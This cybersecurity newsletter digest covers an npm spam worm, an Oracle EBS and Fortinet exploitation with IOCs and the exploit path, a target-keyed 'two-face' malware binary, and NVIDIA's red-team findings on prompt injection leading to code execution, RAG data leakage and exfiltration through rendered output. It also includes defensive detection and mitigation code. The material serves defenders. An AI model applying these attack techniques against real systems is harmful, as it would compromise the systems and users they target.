
npm Worm Attack 🐛, Firefox Anti Fingerprinting 🦊, Google Sues Smishing Triad 💬


TLDR

Together With 1Password

TLDR Information Security 2025-11-14

Webinar: How Reddit matured access management with 1Password (Sponsor)

Weak and compromised passwords are the #1 cause of breaches, and they leave IT teams struggling with fragmented access management and manual onboarding/offboarding processes. Reddit was dealing with all these challenges and more. They needed a solution that reduced credential risk without slowing down their employees.

In this webinar, Reddit's Sr. Manager of Enterprise Security & Systems, Nick Fohs, shares the inside story of how his team used 1Password to manage credentials across the entire company. You'll get a first-hand look at the problems they faced, and the impact 1Password has had on security and efficiency.

Watch now

🔓

Attacks & Vulnerabilities

Over 67,000 Fake npm Packages Flood Registry in Worm-Like Spam Attack (5 minute read)

Cybersecurity researchers uncovered a massive spam campaign flooding npm with over 67,000 fake packages dubbed "IndonesianFoods." The worm-like attack, active since early 2024, exploits dormant JavaScript files requiring manual execution to bypass security scanners. Attackers likely monetize the campaign through the Tea protocol by artificially inflating impact scores to earn cryptocurrency tokens, while creating a self-replicating network that strains registry infrastructure and pollutes search results.

Cl0p Ransomware Lists NHS UK as Victim, Days After Washington Post Breach (3 minute read)

The Cl0p ransomware group claimed the NHS UK as a victim on November 11, days after breaching The Washington Post by exploiting CVE-2025-61882, a critical remote code execution vulnerability (CVSS 9.8) in Oracle E-Business Suite versions 12.2.3-12.2.14. The vulnerability was exploited beginning August 2025 before Oracle's October 4 emergency patch, with attacks accelerating after Scattered Lapsus$ Hunters leaked proof-of-concept code on October 3, enabling Cl0p and FIN11 to conduct synchronized data-exfiltration campaigns against hundreds of organizations. Organizations running Oracle EBS must immediately apply the October 2025 patch, conduct forensic reviews dating back to August, and monitor for connections to suspicious IP addresses 200.107.207.26 and 185.181.60.11.

Suspected Fortinet Zero Day Exploited in the Wild (2 minute read)

A suspected zero-day path traversal vulnerability in Fortinet firewall devices is actively being exploited to create admin-level user accounts through HTTP POST requests to /api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi. Attackers are deploying payloads from 15 source IP addresses, including 107.152.41.19 and 185.192.70.x ranges and 64.95.13.8, using specific username/password pairs like "Testpoint/AFT3$tH4ck" and "trader1/3eMIXX43". Organizations with exposed Fortinet management interfaces should promptly investigate for unauthorized admin accounts, monitor for connections to these IPs, and look for suspicious POST requests to the endpoint while awaiting vendor patches.
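The Cl0p and Fortinet items above both end with the same defensive ask: watch for the listed source IPs and, for Fortinet, for POST requests that traverse out of the admin endpoint. The following is an added example (not code from either source article or from any vendor) that turns those indicators into a log check. It scans constructed access-log lines in combined log format; the log format, the "185.192.70.x" range being read as a /24, and the sample endpoints are assumptions, and real Fortinet or Oracle EBS logs will need their own parser.

```python
import ipaddress
import re
from urllib.parse import unquote

# Indicators quoted in the two newsletter items above.
CL0P_IPS = {"200.107.207.26", "185.181.60.11"}             # Oracle EBS / Cl0p item
FORTINET_IPS = {"107.152.41.19", "64.95.13.8"}             # Fortinet item
FORTINET_NETS = [ipaddress.ip_network("185.192.70.0/24")]  # "185.192.70.x", read as a /24 (assumption)

# Endpoint abused by the Fortinet path traversal, and the target it traverses to.
TRAVERSAL_ENDPOINT = "/api/v2.0/cmdb/system/admin"
TRAVERSAL_TARGET = "/cgi-bin/fwbcgi"

# Combined log format: client ip, timestamp, request line, status.
# Real Fortinet or Oracle logs differ; this format is an assumption for the sample.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def ip_ioc_label(ip: str):
    """Return which item's indicator list an IP belongs to, or None."""
    if ip in CL0P_IPS:
        return "cl0p"
    if ip in FORTINET_IPS:
        return "fortinet"
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return None
    if any(addr in net for net in FORTINET_NETS):
        return "fortinet"
    return None


def is_admin_traversal(method: str, raw_path: str) -> bool:
    """True for a POST whose decoded path starts at the admin endpoint and
    traverses with '../' into /cgi-bin/fwbcgi. Decoding twice catches
    double-encoded variants such as %252e%252e. A plain POST to the admin
    endpoint (legitimate API use) is not flagged."""
    if method != "POST":
        return False
    decoded = unquote(unquote(raw_path))
    return (decoded.startswith(TRAVERSAL_ENDPOINT)
            and "../" in decoded
            and TRAVERSAL_TARGET in decoded)


def scan_log(lines):
    """Return one finding per suspicious line: {'ip', 'timestamp', 'reasons'}."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable lines are skipped here; count them in production
        reasons = []
        label = ip_ioc_label(m["ip"])
        if label:
            reasons.append(f"ioc-ip:{label}")
        if is_admin_traversal(m["method"], m["path"]):
            reasons.append("fortinet-admin-traversal")
        if reasons:
            findings.append({"ip": m["ip"], "timestamp": m["ts"], "reasons": reasons})
    return findings


# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [12/Nov/2025:10:00:01 +0000] "GET /api/v2.0/monitor/status HTTP/1.1" 200 512
107.152.41.19 - - [12/Nov/2025:10:00:07 +0000] "POST /api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi HTTP/1.1" 200 128
185.192.70.44 - - [12/Nov/2025:10:00:09 +0000] "GET /login HTTP/1.1" 200 2048
200.107.207.26 - - [12/Nov/2025:10:01:15 +0000] "GET /index.html HTTP/1.1" 302 0
198.51.100.7 - - [12/Nov/2025:10:02:00 +0000] "POST /api/v2.0/cmdb/system/admin HTTP/1.1" 403 64
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG.splitlines()):
        print(finding)
```

Three of the five constructed lines are flagged: the traversal POST from a listed IP (two reasons), a request from inside the 185.192.70.0/24 range, and a request from one of the Cl0p addresses. The legitimate-looking POST to the admin endpoint without traversal is deliberately left alone. A hit on an IP indicator is a reason to pull the forensic timeline the Cl0p item asks for; a traversal hit is the point at which to check the device for admin accounts nobody created.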

🧠

Strategies & Tactics

Creating a "Two-Face" Rust Binary on Linux (8 minute read)

A "two-face" binary is a binary that contains a malicious program designed to run on a target host and a benign binary that executes on any other host. To ensure that the malicious program runs only on the target host, it is encrypted with a key derived from the target's disk partition UUIDs. The author of this article developed a twoface Rust binary to implement this process, which also includes defenses to prevent detection of the decrypted binary.

Configuring the AWS WAF Anti-DDOS Managed Rule Group For Your Resources and Clients (7 minute read)

AWS WAF provides an Anti-DDOS managed rule group to detect and mitigate HTTP DDOS events. By default, the rule group uses a JavaScript challenge for all GET requests with low or medium suspicion and blocks all GET requests with high suspicion of contributing to DDoS attacks. This post provides ways to customize the rule group for scenarios where clients don't support the JavaScript challenge, clients can't use the WAF client integration, non-challengeable requests overwhelm resources, and when challengeable requests overwhelm resources before they're blocked.

Practical LLM Security Advice from the NVIDIA AI Red Team (6 minute read)

The NVIDIA AI Red Team has observed three common vulnerabilities in the implementation of AI systems. The first vulnerability involves directly executing LLM-generated code, which could lead to remote code execution in the case of direct or indirect prompt injection. The second vulnerability is related to insufficient access controls in RAG data sources, which could allow a user to read data they are not privileged to read or write data to the data store. The third vulnerability is related to active content rendering of LLM outputs, which could lead to information leakage via images or other network requests.
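The three weaknesses in the NVIDIA item map onto three small mitigations that are easiest to see side by side. The block below is an added example written for this digest, not NVIDIA's code or a reproduction of the original post: (1) model output is parsed as a JSON tool call and checked against an allowlist instead of being handed to `exec`; (2) a RAG retriever filters chunks by the caller's groups before ranking, so an unauthorised chunk never enters the prompt; (3) markdown images and links in model output are neutralised unless they point at an allowlisted origin, which closes the image-fetch exfiltration channel. The tool names, the corpus, the group names and `docs.example.com` are all constructed for the example.

```python
import json
import re
from urllib.parse import urlparse

# --- 1. Do not execute LLM-generated code: accept only an allowlisted structured action ---
# Hypothetical tools and the exact argument names each accepts.
ALLOWED_TOOLS = {"get_weather": {"city"}, "lookup_order": {"order_id"}}


def parse_tool_call(llm_output: str) -> dict:
    """Parse the model reply as a JSON tool call and validate it against ALLOWED_TOOLS.
    Anything else (free text, Python, an unknown tool, extra arguments) is rejected,
    so an injected instruction never reaches an interpreter."""
    try:
        call = json.loads(llm_output)
    except json.JSONDecodeError:
        raise ValueError("model output is not a JSON tool call")
    if not isinstance(call, dict) or call.get("tool") not in ALLOWED_TOOLS:
        raise ValueError("tool not allowlisted")
    args = call.get("args", {})
    if not isinstance(args, dict) or set(args) != ALLOWED_TOOLS[call["tool"]]:
        raise ValueError("unexpected arguments")
    if not all(isinstance(v, str) and len(v) < 200 for v in args.values()):
        raise ValueError("argument type or length not allowed")
    return {"tool": call["tool"], "args": args}


# --- 2. RAG: enforce the caller's permissions at retrieval time ---
# Constructed corpus; each chunk carries the groups allowed to read it.
CORPUS = [
    {"id": "d1", "text": "Public holiday schedule", "allowed_groups": {"everyone"}},
    {"id": "d2", "text": "Q3 payroll export", "allowed_groups": {"finance"}},
    {"id": "d3", "text": "Incident postmortem report", "allowed_groups": {"security", "finance"}},
]


def retrieve(query: str, user_groups: set, k: int = 5) -> list:
    """Keyword overlap stands in for vector search. The ACL filter runs *before*
    ranking, so a chunk the user may not read cannot be selected or leaked via
    its score; top-k is applied only to readable chunks."""
    readable = [d for d in CORPUS if d["allowed_groups"] & user_groups]
    terms = set(query.lower().split())
    scored = [(len(terms & set(d["text"].lower().split())), d) for d in readable]
    scored = [(s, d) for s, d in scored if s > 0]
    scored.sort(key=lambda sd: -sd[0])
    return [d for _, d in scored[:k]]


# --- 3. Active content: neutralise images/links that would fetch attacker-chosen URLs ---
TRUSTED_HOSTS = {"docs.example.com"}  # assumption: origins the application itself serves
MD_LINK_RE = re.compile(r"!?\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def sanitize_markdown(text: str) -> str:
    """Keep markdown images/links only for https URLs on trusted hosts. An image
    tag pointing elsewhere would be fetched by the renderer (with whatever the
    model put in the query string), so it is replaced by a visible placeholder."""
    def repl(m):
        label, url = m.group(1), m.group(2)
        if url.startswith("https://") and urlparse(url).hostname in TRUSTED_HOSTS:
            return m.group(0)
        if m.group(0).startswith("!"):
            return f"[image removed: {label}]"
        return f"[{label}](blocked)"
    return MD_LINK_RE.sub(repl, text)


if __name__ == "__main__":
    print(parse_tool_call('{"tool": "get_weather", "args": {"city": "Oslo"}}'))
    print(retrieve("payroll export", {"everyone"}))
    print(sanitize_markdown("![chart](https://attacker.example/?q=SECRET) [docs](https://docs.example.com/a)"))
```

The ordering in `retrieve` is the part that matters: filtering after ranking still lets a forbidden chunk influence which results are returned, and filtering in the prompt template is too late because the chunk has already been fetched. For output rendering, an allowlist of origins is simpler to reason about than trying to spot secrets in query strings.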

🧑‍💻

Launches & Tools

Employees don't trust AI? Learn how ASOS, Tines, and Genesys are bridging the gap (Sponsor)

40% of IT teams still mistrust AI-generated outcomes. In this on-demand Tines webinar, 7x CIO Mark Settle, ASOS CISO Indu Sajeev, and Genesys CIO Trevor Schulze explore how orchestration can bridge governance gaps and boost employee confidence - opening the door to secure, responsible AI adoption.

Watch the webinar

Win11Debloat (GitHub Repo)

Win11Debloat is a PowerShell script that removes preinstalled apps, disables telemetry, and performs various other changes to customize, declutter, and improve the Windows 11 user experience.

Sweet Security (Product Launch)

Sweet Security offers AI-powered security solutions for real-time threat detection and response across cloud and AI environments. The platform uncovers shadow AI, misconfigurations, risky access, and prevents prompt injection and abnormal model behavior.

Shannon (GitHub Repo)

Shannon is an AI pentester whose goal is to break your web app before someone else does. It autonomously hunts for attack vectors in your code, then uses its built-in browser to execute real exploits, such as injection attacks and auth bypass, to prove the vulnerability is actually exploitable.

🎁

Miscellaneous

Mozilla Firefox Gets New Anti-Fingerprinting Defenses (2 minute read)

Mozilla has announced that, beginning in the recently released Firefox 145, further fingerprinting blocking will be implemented, dropping the percentage of user trackability to 20%. The specific enhancements block requests to discover installed fonts, hardware details, number of processor cores, multi-touch support, and dock/taskbar dimensions. The enhancements will initially be rolled out for users in Private Browsing who set their Enhanced Tracking Protection to Strict.

NHS supplier ends probe into ransomware attack that contributed to patient death (2 minute read)

Synnovis has completed an exhaustive 18-month investigation into a crippling ransomware attack in June 2024 that affected nearly a million NHS patients, severely disrupted London pathology services, and led to a patient's death. The probe struggled with fragmented data. While no ransom was paid and systems were replaced, many patients must still wait for official notification of whether their data was compromised.

Google Sues to Disrupt Chinese SMS Phishing Triad (2 minute read)

Google filed a lawsuit in the Southern District of New York against 25 individuals connected to Lighthouse, a Chinese phishing-as-a-service toolkit that has compromised over 1 million victims across 120 countries by spoofing USPS, toll road operators, e-commerce sites, and financial institutions via SMS. The operation captures payment card data through fake mobile sites and then exploits the legitimate Apple Pay and Google Pay enrollment processes by tricking victims into providing one-time authentication codes, enabling attackers to load stolen cards onto mobile wallets they control. Security teams should monitor SMS gateways for brand impersonation, educate users to verify unexpected payment requests through official channels, and watch for unusual mobile wallet enrollment patterns that could indicate credential theft.

Quick Links

Elon Musk's X botched its security key switchover, locking users out (2 minute read)

Elon Musk's X platform disrupted user access by mishandling the switch from twitter.com to x.com for two-factor authentication with security keys or passkeys; many users were locked out, caught in error loops, and unable to re-enroll.

Google Paid Out $458,000 at Live Hacking Event (2 minute read)

Google awarded $458,000 in bounty rewards at the ESCAL8 bugSWAT event after 38 top security researchers reported 107 vulnerabilities across AI, Android, and Google Cloud.

Love TLDR? Tell your friends and get rewards!

Share your referral link below with friends to get free TLDR swag!
Track your referrals here.

Want to advertise in TLDR? 📰

If your company is interested in reaching an audience of cybersecurity professionals and decision makers, you may want to advertise with us.

Want to work at TLDR? 💼

Apply here or send a friend's resume to jobs@tldr.tech and get $1k if we hire them!

If you have any comments or feedback, just respond to this email!

Thanks for reading,
Prasanna Gautam, Eric Fernandez & Sammy Tbeile


Manage your subscriptions to our other newsletters on tech, startups, and programming. Or if TLDR Information Security isn't for you, please unsubscribe.
